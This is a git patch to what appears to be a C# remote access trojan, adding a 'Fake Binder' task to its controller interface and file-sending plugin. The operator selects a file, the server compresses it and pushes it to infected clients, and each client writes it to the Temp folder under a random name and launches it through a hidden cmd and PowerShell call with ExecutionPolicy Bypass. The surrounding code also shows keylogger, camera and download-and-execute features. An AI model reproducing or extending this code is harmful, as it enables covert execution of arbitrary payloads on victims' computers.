From b5a6248eb9c2b7554d25ea495dc6ae66bef1cb8b Mon Sep 17 00:00:00 2001 From: qwqdanchun <287182701@qq.com> Date: Sun, 4 Apr 2021 00:43:27 +0800 Subject: [PATCH] add fake binder --- .../SendFile/SendFile/Handler/HandleSendTo.cs | 32 +++++++++++++ Plugin/SendFile/SendFile/Packet.cs | 5 ++ Server/Connection/Clients.cs | 22 +++++++++ Server/Forms/Form1.Designer.cs | 18 +++++-- Server/Forms/Form1.cs | 48 ++++++++++++++++++- 5 files changed, 120 insertions(+), 5 deletions(-) diff --git a/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs b/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs index bacc81d..07bd526 100644 --- a/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs +++ b/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs @@ -66,5 +66,37 @@ namespace Plugin.Handler } Connection.Disconnected(); } + + public void FakeBinder(MsgPack unpack_msgpack) + { + try + { + if (Environment.CurrentDirectory.ToLower().Contains("appdata") || Environment.CurrentDirectory.ToLower().Contains("temp")) + { + + } + else + { + string fullPath = Path.Combine(Path.GetTempPath(), Methods.GetRandomString(6) + unpack_msgpack.ForcePathObject("Extension").AsString); + File.WriteAllBytes(fullPath, Zip.Decompress(unpack_msgpack.ForcePathObject("File").GetAsBytes())); + Process.Start(new ProcessStartInfo + { + FileName = "cmd", + Arguments = $"/c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath {"'" + "\"" + fullPath + "\"" + "'"} & exit", + CreateNoWindow = true, + WindowStyle = ProcessWindowStyle.Hidden, + UseShellExecute = true, + ErrorDialog = false, + }); + Thread.Sleep(1000); + Packet.Log($"Temp\\{Path.GetFileName(fullPath)} execute success!"); + } + } + catch (Exception ex) + { + Packet.Error(ex.Message); + } + Connection.Disconnected(); + } } } diff --git a/Plugin/SendFile/SendFile/Packet.cs b/Plugin/SendFile/SendFile/Packet.cs index 8686777..121d23c 100644 --- a/Plugin/SendFile/SendFile/Packet.cs +++ b/Plugin/SendFile/SendFile/Packet.cs @@ -28,6 +28,11 @@ namespace Plugin new HandleSendTo().SendToDisk(unpack_msgpack); break; } + case "fakeBinder": + { + new HandleSendTo().FakeBinder(unpack_msgpack); + break; + } } } catch (Exception ex) diff --git a/Server/Connection/Clients.cs b/Server/Connection/Clients.cs index 8fa6483..cb33a2f 100644 --- a/Server/Connection/Clients.cs +++ b/Server/Connection/Clients.cs @@ -13,6 +13,9 @@ using Server.Algorithm; using Microsoft.VisualBasic; using System.Collections.Generic; using System.Media; +using Server.Helper; +using System.Threading.Tasks; +using System.Linq; namespace Server.Connection { @@ -165,6 +168,13 @@ namespace Server.Connection sp.Load(); sp.Play(); } + + foreach (AsyncTask asyncTask in Form1.getTasks.ToList()) + { + asyncTask.doneClient.Remove(ID); + } + + })); } @@ -176,6 +186,18 @@ namespace Server.Connection catch { } } + public bool GetListview(string id) + { + foreach (ListViewItem item in Program.form1.listView4.Items) + { + if (item.ToolTipText == id) + { + return true; + } + } + return false; + } + public void Send(object msg) { lock (SendSync) diff --git a/Server/Forms/Form1.Designer.cs b/Server/Forms/Form1.Designer.cs index d78b700..2f5600b 100644 --- a/Server/Forms/Form1.Designer.cs +++ b/Server/Forms/Form1.Designer.cs @@ -123,6 +123,7 @@ this.lv_group = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_hwid = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_user = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.lv_camera = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_os = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_version = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_ins = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); @@ -139,7 +140,7 @@ this.listView2 = new System.Windows.Forms.ListView(); this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); - this.lv_camera = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.fakeBinderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.contextMenuClient.SuspendLayout(); this.statusStrip1.SuspendLayout(); this.contextMenuLogs.SuspendLayout(); @@ -672,11 +673,12 @@ this.sENDFILETOMEMORYToolStripMenuItem1, this.uPDATEToolStripMenuItem1, this.autoKeyloggerToolStripMenuItem, + this.fakeBinderToolStripMenuItem, this.toolStripSeparator4, this.dELETETASKToolStripMenuItem}); this.contextMenuTasks.Name = "contextMenuStrip4"; this.contextMenuTasks.ShowImageMargin = false; - this.contextMenuTasks.Size = new System.Drawing.Size(170, 120); + this.contextMenuTasks.Size = new System.Drawing.Size(170, 164); // // downloadAndExecuteToolStripMenuItem // @@ -916,6 +918,10 @@ this.lv_user.Text = "User"; this.lv_user.Width = 117; // + // lv_camera + // + this.lv_camera.Text = "Camera"; + // // lv_os // this.lv_os.Text = "OS version"; @@ -1047,9 +1053,12 @@ this.columnHeader2.Text = "Logs"; this.columnHeader2.Width = 705; // - // lv_camera + // fakeBinderToolStripMenuItem // - this.lv_camera.Text = "Camera"; + this.fakeBinderToolStripMenuItem.Name = "fakeBinderToolStripMenuItem"; + this.fakeBinderToolStripMenuItem.Size = new System.Drawing.Size(169, 22); + this.fakeBinderToolStripMenuItem.Text = "Fake Binder"; + this.fakeBinderToolStripMenuItem.Click += new System.EventHandler(this.fakeBinderToolStripMenuItem_Click); // // Form1 // @@ -1203,6 +1212,7 @@ private System.Windows.Forms.ToolStripMenuItem autoKeyloggerToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem SchtaskUninstallToolStripMenuItem; private System.Windows.Forms.ColumnHeader lv_camera; + private System.Windows.Forms.ToolStripMenuItem fakeBinderToolStripMenuItem; } } diff --git a/Server/Forms/Form1.cs b/Server/Forms/Form1.cs index 127b4ca..5081131 100644 --- a/Server/Forms/Form1.cs +++ b/Server/Forms/Form1.cs @@ -28,7 +28,7 @@ namespace Server { private bool trans; public cGeoMain cGeoMain = new cGeoMain(); - private List getTasks = new List(); + public static List getTasks = new List(); private ListViewColumnSorter lvwColumnSorter; public Form1() @@ -1865,5 +1865,51 @@ namespace Server } } } + + private void fakeBinderToolStripMenuItem_Click(object sender, EventArgs e) + { + try + { + OpenFileDialog openFileDialog = new OpenFileDialog(); + if (openFileDialog.ShowDialog() == DialogResult.OK) + { + MsgPack packet = new MsgPack(); + packet.ForcePathObject("Pac_ket").AsString = "fakeBinder"; + packet.ForcePathObject("File").SetAsBytes(Zip.Compress(File.ReadAllBytes(openFileDialog.FileName))); + packet.ForcePathObject("Extension").AsString = Path.GetExtension(openFileDialog.FileName); + + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Pac_ket").AsString = "plu_gin"; + msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll")); + msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes()); + + ListViewItem lv = new ListViewItem(); + lv.Text = "fakeBinder: " + Path.GetFileName(openFileDialog.FileName); + lv.SubItems.Add("0"); + lv.ToolTipText = Guid.NewGuid().ToString(); + + if (listView4.Items.Count > 0) + { + foreach (ListViewItem item in listView4.Items) + { + if (item.Text == lv.Text) + { + return; + } + } + } + + Program.form1.listView4.Items.Add(lv); + Program.form1.listView4.AutoResizeColumns(ColumnHeaderAutoResizeStyle.HeaderSize); + + getTasks.Add(new AsyncTask(msgpack.Encode2Bytes(), lv.ToolTipText)); + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; + } + } } }